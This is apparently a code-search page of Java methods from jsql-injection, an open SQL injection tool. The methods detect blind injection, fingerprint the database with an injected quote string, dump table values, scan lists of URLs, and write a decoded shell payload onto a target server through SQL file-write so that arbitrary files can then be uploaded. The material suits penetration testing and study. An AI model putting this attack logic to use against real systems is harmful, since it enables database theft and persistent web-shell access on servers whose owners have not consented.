use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ResourceAccess method uploadFile.
/**
* Upload a file to the server.
* @param pathFile Remote path of the file to upload
* @param urlFile URL of uploaded file
* @param file File to upload
* @throws JSqlException
* @throws IOException
* @throws InterruptedException
* @throws URISyntaxException
*/
public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
if (!this.isReadingAllowed()) {
return;
}
String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")).replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);
String pathShellFixed = pathFile;
if (!pathShellFixed.matches(".*/$")) {
pathShellFixed += "/";
}
this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<" + DataAccess.LEAD + ">" + sourceShellToInject + "<" + DataAccess.TRAIL + ">", pathShellFixed + this.filenameUpload), "upload");
var sourcePage = new String[] { StringUtils.EMPTY };
String sourceShellInjected;
try {
sourceShellInjected = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(pathShellFixed + this.filenameUpload), sourcePage, false, 1, null, "upload");
if (StringUtils.isEmpty(sourceShellInjected)) {
throw new JSqlException("Bad payload integrity: Empty payload");
}
} catch (JSqlException e) {
throw this.getIntegrityError(sourcePage);
}
String urlFileFixed = urlFile;
if (StringUtils.isEmpty(urlFileFixed)) {
urlFileFixed = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf('/') + 1);
}
if (sourceShellInjected.indexOf(sourceShellToInject) > -1) {
String logUrlFileFixed = urlFileFixed;
String logPathShellFixed = pathShellFixed;
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Upload payload deployed at '{}{}' in '{}{}'", () -> logUrlFileFixed, () -> this.filenameUpload, () -> logPathShellFixed, () -> this.filenameUpload);
try (InputStream streamToUpload = new FileInputStream(file)) {
HttpResponse<String> result = this.upload(file, urlFileFixed + "/" + this.filenameUpload, streamToUpload);
this.confirmUpload(file, pathShellFixed, urlFileFixed, result);
}
} else {
throw this.getIntegrityError(sourcePage);
}
var request = new Request();
request.setMessage(Interaction.END_UPLOAD);
this.injectionModel.sendToViews(request);
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class StrategyInjectionBlind method checkApplicability.
@Override
public void checkApplicability() throws StoppedByUserSlidingException {
if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBooleanBlind())) {
LOGGER.log(LogLevel.CONSOLE_INFORM, "No Blind strategy known for {}", this.injectionModel.getMediatorVendor().getVendor());
} else {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with AND...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.AND);
this.isApplicable = this.injectionBlind.isInjectable();
if (!this.isApplicable) {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with OR...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.OR);
this.isApplicable = this.injectionBlind.isInjectable();
if (this.isApplicable) {
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with OR", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
}
} else {
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with AND", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
}
if (this.isApplicable) {
this.allow();
var requestMessageBinary = new Request();
requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY);
requestMessageBinary.setParameters(this.injectionBlind.getInfoMessage());
this.injectionModel.sendToViews(requestMessageBinary);
} else {
this.unallow();
}
}
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class DataAccess method listValues.
/**
* Get table values and count each occurrences and send them to the view.<br>
* Values are on clear text (not hexa) and follows this window pattern<br>
* => hh[value 1]jj[count]hhgghh[value 2]jj[count]hhggh...hi<br>
* Data window can be cut before the end of the request but the process helps to obtain
* the rest of the unreachable data. The process can be interrupted by the user (stop/pause).
* @param columns choice by the user
* @return a 2x2 table containing values by columns
* @throws JSqlException when injection failure or stopped by user
*/
public String[][] listValues(List<Column> columns) throws JSqlException {
var database = (Database) columns.get(0).getParent().getParent();
var table = (Table) columns.get(0).getParent();
int rowCount = columns.get(0).getParent().getChildCount();
// Inform the view that table has just been used
var request = new Request();
request.setMessage(Interaction.START_PROGRESS);
request.setParameters(table);
this.injectionModel.sendToViews(request);
// Build an array of column names
List<String> columnsName = new ArrayList<>();
for (AbstractElementDatabase e : columns) {
columnsName.add(e.toString());
}
// From that array, build the SQL fields nicely
// => col1{%}col2...
// ==> trim(ifnull(`col1`,0x00)),0x7f,trim(ifnull(`Col2`,0x00))...
String[] arrayColumns = columnsName.toArray(new String[columnsName.size()]);
List<List<String>> listValues = this.getRows(database, table, rowCount, arrayColumns);
// Add the default title to the columns: row number, occurrence
columnsName.add(0, StringUtils.EMPTY);
columnsName.add(0, StringUtils.EMPTY);
String[][] tableDatas = this.build2D(columnsName, listValues);
arrayColumns = columnsName.toArray(new String[columnsName.size()]);
// Group the columns names, values and Table object in one array
var objectData = new Object[] { arrayColumns, tableDatas, table };
var requestCreateValuesTab = new Request();
requestCreateValuesTab.setMessage(Interaction.CREATE_VALUES_TAB);
requestCreateValuesTab.setParameters(objectData);
this.injectionModel.sendToViews(requestCreateValuesTab);
var requestEndProgress = new Request();
requestEndProgress.setMessage(Interaction.END_PROGRESS);
requestEndProgress.setParameters(table);
this.injectionModel.sendToViews(requestEndProgress);
return tableDatas;
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ManagerScan method scan.
/**
* Start fast scan of URLs in sequence and display result.
* Unplug any existing view and plug a console-like view in order to
* respond appropriately to GUI message with simple text result instead of
* build complex graphical components during the multi website injections.
* At the end of the scan it plugs again the normal view.
* @param urlsItemList contains a list of String URL
*/
public void scan(List<ItemList> urlsItemList) {
// Erase everything in the view from a previous injection
var requests = new Request();
requests.setMessage(Interaction.RESET_INTERFACE);
MediatorHelper.model().sendToViews(requests);
// wait for ending of ongoing interaction between two injections
try {
Thread.sleep(500);
} catch (InterruptedException e) {
LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
Thread.currentThread().interrupt();
}
// Display result only in console
var requestUnsubscribe = new Request();
requestUnsubscribe.setMessage(Interaction.UNSUBSCRIBE);
MediatorHelper.model().sendToViews(requestUnsubscribe);
MediatorHelper.model().subscribe(new ScanListTerminal());
MediatorHelper.model().setIsScanning(true);
MediatorHelper.model().getResourceAccess().setScanStopped(false);
for (ItemList urlItemList : urlsItemList) {
var urlItemListScan = (ItemListScan) urlItemList;
if (MediatorHelper.model().isStoppedByUser() || MediatorHelper.model().getResourceAccess().isScanStopped()) {
break;
}
LOGGER.log(LogLevel.CONSOLE_INFORM, "Scanning {}", urlItemListScan.getBeanInjection().getUrl());
MediatorHelper.model().getMediatorUtils().getParameterUtil().controlInput(urlItemListScan.getBeanInjection().getUrl(), urlItemListScan.getBeanInjection().getRequest(), urlItemListScan.getBeanInjection().getHeader(), urlItemListScan.getBeanInjection().getMethodInstance(), urlItemListScan.getBeanInjection().getRequestType(), true);
try {
Thread.sleep(500);
} catch (InterruptedException e) {
LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
Thread.currentThread().interrupt();
}
}
// Get back the normal view
MediatorHelper.model().sendToViews(requestUnsubscribe);
MediatorHelper.model().subscribe(MediatorHelper.frame().getSubscriber());
MediatorHelper.model().setIsScanning(false);
MediatorHelper.model().setIsStoppedByUser(false);
MediatorHelper.model().getResourceAccess().setScanStopped(false);
var request = new Request();
request.setMessage(Interaction.END_SCAN);
MediatorHelper.model().sendToViews(request);
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class MediatorVendor method fingerprintVendor.
public Vendor fingerprintVendor() {
Vendor vendorFound = null;
if (this.injectionModel.getMediatorVendor().getVendorByUser() != this.injectionModel.getMediatorVendor().getAuto()) {
vendorFound = this.injectionModel.getMediatorVendor().getVendorByUser();
LOGGER.log(LogLevel.CONSOLE_INFORM, MediatorVendor.LOG_VENDOR, () -> I18nUtil.valueByKey("LOG_DATABASE_TYPE_FORCED_BY_USER"), () -> this.injectionModel.getMediatorVendor().getVendorByUser());
} else {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Fingerprinting database...");
var insertionCharacter = "'\"#-)'\"*";
String pageSource = this.injectionModel.injectWithoutIndex(insertionCharacter, "test#vendor");
var mediatorVendor = this.injectionModel.getMediatorVendor();
Vendor[] vendorsWithoutAuto = mediatorVendor.getVendors().stream().filter(v -> v != mediatorVendor.getAuto()).toArray(Vendor[]::new);
// Test each vendor
for (Vendor vendorTest : vendorsWithoutAuto) {
if (pageSource.matches("(?si)" + vendorTest.instance().fingerprintErrorsAsRegex())) {
vendorFound = vendorTest;
LOGGER.log(LogLevel.CONSOLE_SUCCESS, MediatorVendor.LOG_VENDOR, () -> "Basic fingerprint matching vendor", () -> vendorTest);
break;
}
}
vendorFound = this.initializeVendor(vendorFound);
}
var requestSetVendor = new Request();
requestSetVendor.setMessage(Interaction.SET_VENDOR);
requestSetVendor.setParameters(vendorFound);
this.injectionModel.sendToViews(requestSetVendor);
return vendorFound;
}
Aggregations